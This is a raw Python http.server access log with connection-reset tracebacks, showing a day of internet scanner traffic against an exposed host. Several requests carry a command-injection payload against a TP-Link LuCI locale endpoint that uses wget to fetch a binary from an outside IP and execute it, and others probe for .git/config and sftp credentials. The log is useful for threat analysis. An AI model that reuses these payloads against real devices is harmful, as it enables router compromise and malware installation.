self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.151', 5399) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.151', 10658) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.151', 6050) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.151', 10321) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 3.101.240.151 - - [26/Apr/2024 06:17:26] "GET / HTTP/1.0" 200 - 3.101.240.151 - - [26/Apr/2024 06:19:59] code 404, message File not found 3.101.240.151 - - [26/Apr/2024 06:19:59] "GET /nmaplowercheck1714076399 HTTP/1.1" 404 - 3.101.240.151 - - [26/Apr/2024 06:19:59] code 501, message Unsupported method ('POST') 3.101.240.151 - - [26/Apr/2024 06:19:59] "POST /sdk HTTP/1.1" 501 - 3.101.240.151 - - [26/Apr/2024 06:19:59] "GET / HTTP/1.0" 200 - 3.101.240.151 - - [26/Apr/2024 06:20:00] code 404, message File not found 3.101.240.151 - - [26/Apr/2024 06:20:00] "GET /HNAP1 HTTP/1.1" 404 - 3.101.240.151 - - [26/Apr/2024 06:20:00] "GET / HTTP/1.1" 200 - 3.101.240.151 - - [26/Apr/2024 06:20:00] code 404, message File not found 3.101.240.151 - - [26/Apr/2024 06:20:00] "GET /evox/about HTTP/1.1" 404 - 3.101.240.151 - - [26/Apr/2024 06:20:10] code 400, message Bad request version ('æ1=KMjÇNfð´@-Çco´\\x06') 3.101.240.151 - - [26/Apr/2024 06:20:10] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03@\x0c", hIºÈl-K5\x82!e½\x10ÜËX ùª\x8dÅ[q¨cËæ ¼Ã\x1fæ1=KMjÇNfð´@-Çco´\x06" 400 - 3.101.240.151 - - [26/Apr/2024 06:20:10] code 400, message Bad request version ("\\x8bÛ¾\\x04\\x97ä'Ñ\\x18ª\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À") 3.101.240.151 - - [26/Apr/2024 06:20:10] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x038O\x91ÐÄp*¹H6*Ì\x9aÝ<Ü\x8dúßî@mÏè¬öÃøæÑI  w\x8eYÌÁ1ÀË_.\x9e£Íð\x98·¹dMøi\x0b\x8bÛ¾\x04\x97ä'Ñ\x18ª\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.240.151 - - [26/Apr/2024 06:20:10] code 400, message Bad request version ("\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À") 3.101.240.151 - - [26/Apr/2024 06:20:10] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03D%\x1aôy\x94\x9d\x1dq\x87¯\x8b¼ÓÖ \x7f\x19ãý\x1e=àÕ\x99%6ôå|aú *ÉÌ»Ç'«@X\x1a\x7f\x10\x8bÆ¿xUÛ\x18\x86\x9e\x15Q¹~±*\x1c\x12\x18k \x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.240.151 - - [26/Apr/2024 06:20:11] code 400, message Bad request version ("ºhï¹°¨Úp:\\x8aÝgzs\\x14¢;\\x14I°Sqò\\x17í\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À") 3.101.240.151 - - [26/Apr/2024 06:20:11] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03àG\x8f#ãC\x06GS\x00Í\x1e#&D\x91ÔånB\x97K09{p\x8f³<\x87.\x82 \x91\x89à«7r\x09ºhï¹°¨Úp:\x8aÝgzs\x14¢;\x14I°Sqò\x17í\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.240.151 - - [26/Apr/2024 06:20:11] code 400, message Bad request syntax ('\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01ü\\x03\\x03¿×U¸\\x01\\x83½×\\x13Íç') 3.101.240.151 - - [26/Apr/2024 06:20:11] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03¿×U¸\x01\x83½×\x13Íç" 400 - 3.101.240.151 - - [26/Apr/2024 06:20:11] code 400, message Bad request version ('Ù\\x93') 3.101.240.151 - - [26/Apr/2024 06:20:11] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03üN«\x88\x08r[¼\x8eO©µ\x14ÔR)üÀö? &á象ê`i\\x9b¸ô\\x9d;V\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À") 3.101.240.151 - - [26/Apr/2024 06:20:12] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03%7àÎÚ»Î5@ íÛ\x03ã \x0f7©=¿\x83<\x9aÑw\x19së\x01\x94¤\x0f \x19²\x14£yýÄo\x9d\x960¦8ýÕ3\x16\x04ë\x1c\x90\x0c>ê`i\x9b¸ô\x9d;V\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.240.151 - - [26/Apr/2024 06:20:12] code 400, message Bad request version ("|snwâH»h\\x03s\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À") 3.101.240.151 - - [26/Apr/2024 06:20:12] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03]xîÇ·,÷~7'±Q\x13úÃøjEÆRÔDÎQÐÒB·`»\x0b\x93 Ëã\x82\x98Ï¿'8K¹!ß\x12±zÈ\x16à7RA\x09|snwâH»h\x03s\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.240.151 - - [26/Apr/2024 06:20:13] code 400, message Bad request version ("\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À") 3.101.240.151 - - [26/Apr/2024 06:20:13] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03±\x81cÂF\x90\x1aT²\x09VΡúgÚß`\x11SC\x96ur\x93EݽÇ\x01Ã\\ \x8d\x1b\x02\x12÷\x8afb^\x13\x0fv\x07\x1d¤j\x97\x8aaZ!}dh\x01KF\x99phý\x0b\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.240.151 - - [26/Apr/2024 06:20:13] code 400, message Bad request version ('øF¸\\x94oåªÍË<ÜP\\x1b\\x1a\\x88\\x03\\x9eÎüUÌ"ÞóuúU*lòÍ×\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À\\'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À') 3.101.240.151 - - [26/Apr/2024 06:20:13] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03ü Û\x11WU\x1eAm\x86\x98ñôCäªsoT[+P\x09nÉ°\x15\x18ü­¾. øF¸\x94oåªÍË<ÜP\x1b\x1a\x88\x03\x9eÎüUÌ"ÞóuúU*lòÍ×\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.240.151 - - [26/Apr/2024 06:20:13] code 400, message Bad HTTP/0.9 request type ('\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01ü\\x03\\x03Ü\\x05¼Ôy') 3.101.240.151 - - [26/Apr/2024 06:20:13] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03Ü\x05¼Ôy \x8dÄ" 400 - 3.101.240.151 - - [26/Apr/2024 06:20:14] code 400, message Bad request version ('"í\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À\\'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À') 3.101.240.151 - - [26/Apr/2024 06:20:14] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03\x88èæ@¨ìã\x10¿\x96rWÊ\x0dó\x0fa*Ç_s{¥ó\x89\x08.\x9cÚõ\x1fp \x04\x8b\x92xv\x0eG\x82'\x86\x0f\x86£º¾\x00*\x8e|¯Rã Æiý\x7f£\x86\x1e"í\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.240.151 - - [26/Apr/2024 06:20:14] code 400, message Bad request version ('1\\x0f\\xadæç\\xadÖÆXRº>VòØ´°Í¡\\x9clÕà0\\x97»"\\x8f-\\x005K\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À\\'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À') 3.101.240.151 - - [26/Apr/2024 06:20:14] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03@Åhdâ=\x1d\x9eªMÆ\x80½q#R\x8cNW²\x7f\x15³/\x80\x8dcVE©ó» 1\x0f­æç­ÖÆXRº>VòØ´°Í¡\x9clÕà0\x97»"\x8f-\x005K\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.240.151 - - [26/Apr/2024 06:20:14] code 400, message Bad request version ("ZàÒ3\\x97ó!'\\x13êy1\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À") 3.101.240.151 - - [26/Apr/2024 06:20:14] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03-\x1eC×÷,Ï\x8b!=lr\x8d¡9üÜØ\x86¨É²VÂ¥áÜÊ¢\x07¥i iá\x99TÅ\\\x83p\x88?\x07Ó\x12\x91\x92PÅâ \x85ZàÒ3\x97ó!'\x13êy1\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.240.151 - - [26/Apr/2024 06:20:14] code 400, message Bad request version ("t\\x82\\x14!\\x18I\\x89KÇ\\x82\\x07òo@ÞOø\\x95\\x15·;=\\x0e@¬ÞX\\x95\\x83ÛNJ\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À") 3.101.240.151 - - [26/Apr/2024 06:20:14] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03è\x01©2/!,\x06\x01Ç\x98d5rùÜW¿ï§º} \x00P½\x91ðWK\x09\x1c t\x82\x14!\x18I\x89KÇ\x82\x07òo@ÞOø\x95\x15·;=\x0e@¬ÞX\x95\x83ÛNJ\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.240.151 - - [26/Apr/2024 06:20:16] "GET / HTTP/1.1" 200 - 106.75.174.148 - - [26/Apr/2024 07:16:24] code 404, message File not found 106.75.174.148 - - [26/Apr/2024 07:16:24] "GET /.DS_Store HTTP/1.1" 404 - 185.224.128.43 - - [26/Apr/2024 07:43:56] "GET / HTTP/1.1" 200 - 185.191.126.213 - - [26/Apr/2024 07:58:51] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [26/Apr/2024 08:14:35] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [26/Apr/2024 08:14:35] "CONNECT google.com:443 HTTP/1.1" 501 - 146.19.24.28 - - [26/Apr/2024 08:22:23] "GET / HTTP/1.1" 200 - ---------------------------------------- Exception occurred during processing of request from ('206.168.34.42', 34334) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 206.168.34.42 - - [26/Apr/2024 08:48:23] "GET / HTTP/1.1" 200 - 206.168.34.42 - - [26/Apr/2024 08:48:28] "GET / HTTP/1.1" 200 - 206.168.34.42 - - [26/Apr/2024 08:48:28] code 505, message Invalid HTTP version (2.0) 206.168.34.42 - - [26/Apr/2024 08:48:28] "PRI * HTTP/2.0" 505 - 206.168.34.42 - - [26/Apr/2024 08:48:29] code 404, message File not found 206.168.34.42 - - [26/Apr/2024 08:48:29] "GET /favicon.ico HTTP/1.1" 404 - 171.8.155.104 - - [26/Apr/2024 09:03:36] "GET / HTTP/1.1" 200 - 185.122.204.179 - - [26/Apr/2024 09:04:28] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 185.122.204.179 - - [26/Apr/2024 09:04:28] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 89.190.156.175 - - [26/Apr/2024 09:08:37] code 404, message File not found 89.190.156.175 - - [26/Apr/2024 09:08:37] "GET /cgi-bin/luci HTTP/1.1" 404 - 89.190.156.175 - - [26/Apr/2024 09:08:38] code 404, message File not found 89.190.156.175 - - [26/Apr/2024 09:08:38] "GET /login HTTP/1.1" 404 - 89.190.156.175 - - [26/Apr/2024 09:08:39] code 404, message File not found 89.190.156.175 - - [26/Apr/2024 09:08:39] "GET /cgi-bin/luci/admin HTTP/1.1" 404 - 89.190.156.175 - - [26/Apr/2024 09:08:40] "GET / HTTP/1.1" 200 - 179.43.190.218 - - [26/Apr/2024 09:11:57] code 404, message File not found 179.43.190.218 - - [26/Apr/2024 09:11:57] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 83.97.73.245 - - [26/Apr/2024 09:20:06] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 - 171.8.155.104 - - [26/Apr/2024 09:41:16] "GET / HTTP/1.1" 200 - 83.97.73.245 - - [26/Apr/2024 10:04:06] code 404, message File not found 83.97.73.245 - - [26/Apr/2024 10:04:06] "GET /actuator/gateway/routes HTTP/1.1" 404 - 192.241.197.8 - - [26/Apr/2024 10:09:39] code 400, message Bad request syntax ('MGLNDD_203.219.129.101_80') 192.241.197.8 - - [26/Apr/2024 10:09:39] "MGLNDD_203.219.129.101_80" 400 - 109.205.213.198 - - [26/Apr/2024 10:46:51] "GET / HTTP/1.1" 200 - 106.75.173.108 - - [26/Apr/2024 10:58:34] code 404, message File not found 106.75.173.108 - - [26/Apr/2024 10:58:34] "GET /.git/config HTTP/1.1" 404 - 107.151.243.170 - - [26/Apr/2024 11:18:56] "GET / HTTP/1.1" 200 - 45.142.182.92 - - [26/Apr/2024 11:40:16] code 404, message File not found 45.142.182.92 - - [26/Apr/2024 11:40:16] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.163.214.97/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 - 179.43.190.218 - - [26/Apr/2024 11:43:35] code 404, message File not found 179.43.190.218 - - [26/Apr/2024 11:43:35] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 171.8.155.104 - - [26/Apr/2024 11:58:47] "GET / HTTP/1.1" 200 - 106.75.177.107 - - [26/Apr/2024 12:17:22] code 404, message File not found 106.75.177.107 - - [26/Apr/2024 12:17:22] "GET /.vscode/sftp.json HTTP/1.1" 404 - 185.224.128.43 - - [26/Apr/2024 12:45:37] "GET / HTTP/1.1" 200 - 45.128.232.229 - - [26/Apr/2024 13:38:43] "GET / HTTP/1.1" 200 - 192.241.226.26 - - [26/Apr/2024 13:56:39] "GET / HTTP/1.1" 200 - 162.216.150.101 - - [26/Apr/2024 13:57:02] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [26/Apr/2024 14:10:23] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [26/Apr/2024 14:10:23] "CONNECT google.com:443 HTTP/1.1" 501 - 34.77.127.183 - - [26/Apr/2024 14:10:46] "GET / HTTP/1.1" 200 - 64.62.156.86 - - [26/Apr/2024 14:17:32] code 400, message Bad request version ('À\\x14À') 64.62.156.86 - - [26/Apr/2024 14:17:32] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x81\x88Í·VjÀç3MF\x04K&ä\x82\x81ÇB\x1c"³\x94D"\x97»é¹¤\x90;\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 198.235.24.147 - - [26/Apr/2024 14:25:41] "GET / HTTP/1.0" 200 - 139.162.218.67 - - [26/Apr/2024 14:26:48] "GET / HTTP/1.1" 200 - 139.162.218.67 - - [26/Apr/2024 14:26:48] code 400, message Bad request version ('x') 139.162.218.67 - - [26/Apr/2024 14:26:48] "\x16\x03\x01\x00ü\x01\x00\x00ø\x03\x03뺶Ð×\x8fé:\x95!Ôx\x88¨\x13\x89´\x93ì\x17£ê\x96\x85\x97\x8cV\x89Ý\x0eV³ Ñl\x1fð¼ósH¤\x7fÓä\x81Ú?\x09x" 400 - 139.162.218.67 - - [26/Apr/2024 14:26:48] code 400, message Bad request version ('\\x00\\x04\\x03\\x00\\x01\\x02\\x00') 139.162.218.67 - - [26/Apr/2024 14:26:48] "\x16\x03\x01\x00ü\x01\x00\x00ø\x03\x03WÜí[\x1b\x067`\x02ÍqâøÆ\x18\x8a1\x90\x8fÁ½¹/¾\x0e,\x8eÿúsÖ\x02 cüG\x1b%Y7Ø\x14g0\x92_ËþÌjï\x93PØ´\\\x90X$£m¡;Êò\x00$\x13\x02\x13\x03\x13\x01À,À0À+À/̨̩À$À(À#À'\x00\x9f\x00\x9e\x00k\x00g\x00ÿ\x01\x00\x00\x8b\x00\x0b\x00\x04\x03\x00\x01\x02\x00" 400 - 139.162.218.67 - - [26/Apr/2024 14:26:49] code 400, message Bad request version ('\\x00\\x04\\x03\\x00\\x01\\x02\\x00') 139.162.218.67 - - [26/Apr/2024 14:26:49] "\x16\x03\x01\x00ü\x01\x00\x00ø\x03\x03Ù\x8f_\x07#,ðÄ\x14¢©u?\x7f7qó\x06T\x9c-\x95s/Ã\x97\x1fy\x81,\x16Ë }ú$g¢tý\x88ÞÃDßôÝ\x1dIð 